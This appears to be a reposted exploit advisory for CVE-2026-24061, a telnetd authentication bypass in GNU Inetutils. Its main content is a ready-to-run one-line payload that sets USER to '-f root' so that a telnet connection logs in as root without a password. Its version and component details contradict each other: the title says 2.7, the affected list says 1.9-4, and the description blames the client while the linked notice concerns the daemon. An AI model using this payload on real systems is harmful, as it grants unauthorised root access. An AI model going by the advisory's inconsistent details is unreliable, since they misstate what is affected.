GNU Inetutils 2.7 telnet Privilege Escalation
# Titles: Telnet Argument Injection GNU Inetutils 2.7 telnet Privilege Escalation
# Titles: Telnet Argument Injection Privilege Escalation - RCE
# Author: nu11secur1ty
# Date: 1/24/2026
# Vendor: https://www.gnu.org/software/inetutils/
# Software: https://www.gnu.org/software/inetutils/
# Reference:
https://nsfocusglobal.com/gnu-inetutils-telnetd-remote-authentication-bypass-vulnerability-cve-2026-24061-notice/
# CVE-2026-24061
## Description:
Argument/Command Injection via the USER environment variable in the
inetutils telnet client (version 1.9-4+deb10u2 and earlier). The client
improperly passes the USER environment variable contents as command-line
arguments to the telnet daemon (telnetd).
STATUS:
CRITICAL
## Affected Versions:
- inetutils-telnet 1.9-4+deb10u2 and earlier
- Debian 10 (buster) and derivatives
- Possibly other distributions with similar versions
# Attack Vector:
Network/Adjacent (requires telnet access)
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
[+]Payload:
```
USER="-f root" telnet -a 127.0.0.1 2323
```
# Demo:
[href](https://www.patreon.com/posts/telnet-argument-148994220)
# Time spent:
00:01:35
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>
GNU Inetutils 2.7 telnet Privilege Escalation
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 265
